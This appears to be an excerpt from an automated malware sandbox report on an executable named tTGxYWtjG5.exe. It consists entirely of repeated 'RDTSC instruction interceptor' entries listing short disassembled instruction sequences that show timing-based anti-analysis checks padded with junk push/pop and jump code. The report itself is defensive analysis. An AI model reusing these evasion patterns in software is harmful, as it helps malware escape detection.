                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C1649E second address: C164A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C166F5 second address: C166F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C166F9 second address: C166FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C166FD second address: C16705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C1A51B second address: C1A534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2A9129471Fh 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C19E03 second address: C19E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2A913FCE96h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F2A913FCE9Dh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C19E21 second address: C19E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C1A10F second address: C1A113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C1A256 second address: C1A264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 jc 00007F2A91294716h 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C1C7F9 second address: C1C7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C1C7FF second address: C1C803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C1C803 second address: C1C80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C1C80D second address: C1C811 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C1C811 second address: C1C819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C1C819 second address: C1C825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jno 00007F2A91294716h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B7CA8B second address: B7CA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C21B0A second address: C21B11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C21C4E second address: C21C58 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2A913FCE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C21DE7 second address: C21DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2A91294716h 0x0000000a pop esi 0x0000000b pop eax 0x0000000c jo 00007F2A91294741h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C21DFD second address: C21E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C21E01 second address: C21E07 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C21E07 second address: C21E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2A913FCE9Bh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C21F52 second address: C21F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C26F89 second address: C26F8E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C2633C second address: C26342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C26342 second address: C26347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C265F9 second address: C26601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C2673D second address: C26743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C269BB second address: C269D5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2A91294716h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jnc 00007F2A91294716h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C269D5 second address: C269E6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2A913FCE9Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C269E6 second address: C26A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A91294721h 0x00000009 jne 00007F2A91294716h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C26A09 second address: C26A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A913FCE9Ah 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C2AF5B second address: C2AF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2A9129471Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C2A868 second address: C2A879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F2A913FCEBAh 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C30540 second address: C30546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C30546 second address: C3054A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C3054A second address: C3056F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294722h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F2A9129471Ch 0x0000000f jo 00007F2A91294716h 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C306B2 second address: C306E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A913FCEA5h 0x00000009 jmp 00007F2A913FCEA8h 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C306E6 second address: C30703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294727h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C31485 second address: C314A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A913FCE9Eh 0x00000009 jmp 00007F2A913FCEA0h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C314A9 second address: C314BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F2A9129471Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C314BA second address: C314D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F2A913FCE96h 0x0000000a jmp 00007F2A913FCE9Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C31A9B second address: C31ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 jmp 00007F2A91294726h 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C31ABF second address: C31AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C31AC5 second address: C31ACB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C31ACB second address: C31AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C38835 second address: C3883A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C37A25 second address: C37A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C37A29 second address: C37A4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2A9129471Fh 0x00000008 jmp 00007F2A9129471Ch 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C380F0 second address: C3810B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f jc 00007F2A913FCE98h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C3810B second address: C3810F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C3810F second address: C3812B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C3812B second address: C3813C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F2A91294716h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C3813C second address: C38140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C44CE7 second address: C44CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C44CEB second address: C44CFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2A913FCE9Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C44E78 second address: C44E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F2A91294718h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C44E89 second address: C44EA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C44EA0 second address: C44EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C44EA4 second address: C44EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C44FFC second address: C45012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2A9129471Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C45012 second address: C45016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C45016 second address: C45034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F2A9129472Ch 0x0000000c jmp 00007F2A91294720h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C45169 second address: C4516D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C45B7C second address: C45B8C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2A91294716h 0x00000008 jno 00007F2A91294716h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C462D6 second address: C462DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C44194 second address: C4419F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2A91294716h 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C5B180 second address: C5B198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 jnl 00007F2A913FCE96h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jnl 00007F2A913FCE96h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C5B198 second address: C5B19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C5E3E6 second address: C5E3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C67727 second address: C67752 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294724h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F2A9129471Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C6A873 second address: C6A892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F2A913FCEACh 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C7136B second address: C71379 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F2A91294716h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C71379 second address: C7137D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C7137D second address: C71383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C71383 second address: C7138D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F2A913FCE96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C71175 second address: C7117A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C7117A second address: C71198 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2A913FCE9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2A913FCE9Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C772ED second address: C772F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C772F1 second address: C772F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C772F5 second address: C77323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F2A9129471Ch 0x0000000e popad 0x0000000f jnp 00007F2A9129472Eh 0x00000015 pushad 0x00000016 jmp 00007F2A9129471Eh 0x0000001b push esi 0x0000001c pop esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C778C8 second address: C778DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Ch 0x00000007 jne 00007F2A913FCE96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C778DE second address: C778E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C778E6 second address: C778F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C778F7 second address: C77917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2A9129471Ah 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jl 00007F2A91294736h 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C77917 second address: C77921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C77921 second address: C77927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C77927 second address: C7792B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: B8EC29 second address: B8EC2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C963B0 second address: C963D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F2A913FCEADh 0x0000000c jmp 00007F2A913FCEA5h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C963D3 second address: C96434 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2A9129472Ah 0x00000008 push esi 0x00000009 jmp 00007F2A9129471Eh 0x0000000e jno 00007F2A91294716h 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push esi 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c jmp 00007F2A91294726h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F2A9129471Eh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C96434 second address: C96438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C96438 second address: C9643C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C96274 second address: C96287 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2A913FCE9Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C96287 second address: C9628F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C981E2 second address: C981E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C981E7 second address: C981F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2A91294716h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\tTGxYWtjG5.exeRDTSC instruction interceptor: First address: C981F1 second address: C981F7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
